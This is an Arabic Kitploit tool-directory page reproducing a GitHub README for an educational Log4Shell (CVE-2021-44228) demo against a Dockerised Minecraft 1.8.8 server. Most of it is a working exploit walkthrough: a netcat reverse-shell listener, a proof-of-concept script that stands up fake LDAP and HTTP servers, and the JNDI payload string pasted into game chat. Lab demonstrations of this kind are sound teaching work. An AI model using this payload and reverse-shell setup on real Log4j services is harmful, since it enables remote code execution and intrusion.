Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
log4shell-minecraft-demo — Log4Shell (CVE-2021-44228) عرض توضيحي لماينكرافت. يُستخدم للمعارض التعليمية. | Kitploit
أدوات/GitHubGitHub/felixslama/log4shell-minecraft-demo
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubfelixslama/log4shell-minecraft-demo

log4shell-minecraft-demo

Log4Shell (CVE-2021-44228) عرض توضيحي لماينكرافت. يُستخدم للمعارض التعليمية.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ 2 سنواتلم تتم المراجعة بعد

توضيح ثغرة Log4Shell (CVE-2021-44228) في Minecraft

يُستخدم هذا العرض في المعارض التعليمية لمنح الطلاب المحتملين فكرة عن قسم الأمن السيبراني في HTL Villach وكيف يمكن استغلال التطبيقات اليومية

ملاحظة: يعتمد هذا العرض بالكامل على إصدار Minecraft 1.8.8

المهاجم

يستخدم المهاجم في هذا السيناريو إثبات المفهوم (PoC) من kozmer. https://github.com/kozmer/log4j-shell-poc جميع الحقوق تعود لهم. ملاحظة: يجب تنفيذ جميع الأوامر داخل المجلد attacker/

المتطلبات:

root@kitploit:~
pip install -r requirements.txt

الاستخدام:

  • ابدأ مستمع netcat لقبول اتصال الصدفة العكسية.
root@kitploit:~
nc -lvnp 9001
  • أطلق أداة الاستغلال.
    ملاحظة: لكي يعمل هذا، يجب تسمية أرشيف جافا المستخرج باسم: jdk1.8.0_20، وأن يكون في نفس الدليل.
root@kitploit:~
$ python3 poc.py --userip <ip of docker-host> --webport 8000 --lport 9001

[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up fake LDAP server

[+] Send me: ${jndi:ldap://<ip of docker-host>:1389/a}

Listening on 0.0.0.0:1389

يقوم هذا السكريبت بإعداد خادم HTTP وخادم LDAP لك، كما يقوم بإنشاء الحمولة التي يمكنك استخدامها للصقها في المعامل الضعيف. بعد ذلك، إذا سارت الأمور بشكل جيد، ستحصل على صدفة على المنفذ lport.


الضحية

في مثيل الضحية نستخدم إصدار JDK قديم وبالتالي ضعيف (jdk1.8.0_20).

الإعداد الأولي

لتشغيل خادم Minecraft لدينا، علينا بناء صورة Docker الخاصة بنا وتشغيلها.

ملاحظة: لبناء ناجح، تحتاج الحصول على نسختك الخاصة من خادم Minecraft Vanilla 1.8.8 (لا يمكن مشاركتها بسبب اتفاقية ترخيص Mojang) قد يكون المصدر المحتمل MCVERSIONS.NET

بعد الحصول على الملف، احفظه في victim/ باسم server.jar

root@kitploit:~
cd target/
docker build target/ -t minecraft-demo

تشغيل الخادم الضعيف

قم بتشغيل خادم Minecraft الضعيف الذي بنيناه للتو باستخدام docker

root@kitploit:~
docker run --name vulnerable-server -p 25565:25565 minecraft-demo

من المحتمل أن يتجمد الحاوية أو يتوقف بعد الاستغلال. في هذه الحالة يمكنك قتله باستخدام الأمر التالي:

root@kitploit:~
docker kill vulnerable-server

استغلال الخادم

لاستغلال الثغرة، ما عليك سوى إرسال السلسلة التي يوفرها poc.py في دردشة اللعبة.

root@kitploit:~
${jndi:ldap://<ip of docker-host>:1389/a}

image

تنزيل الأداة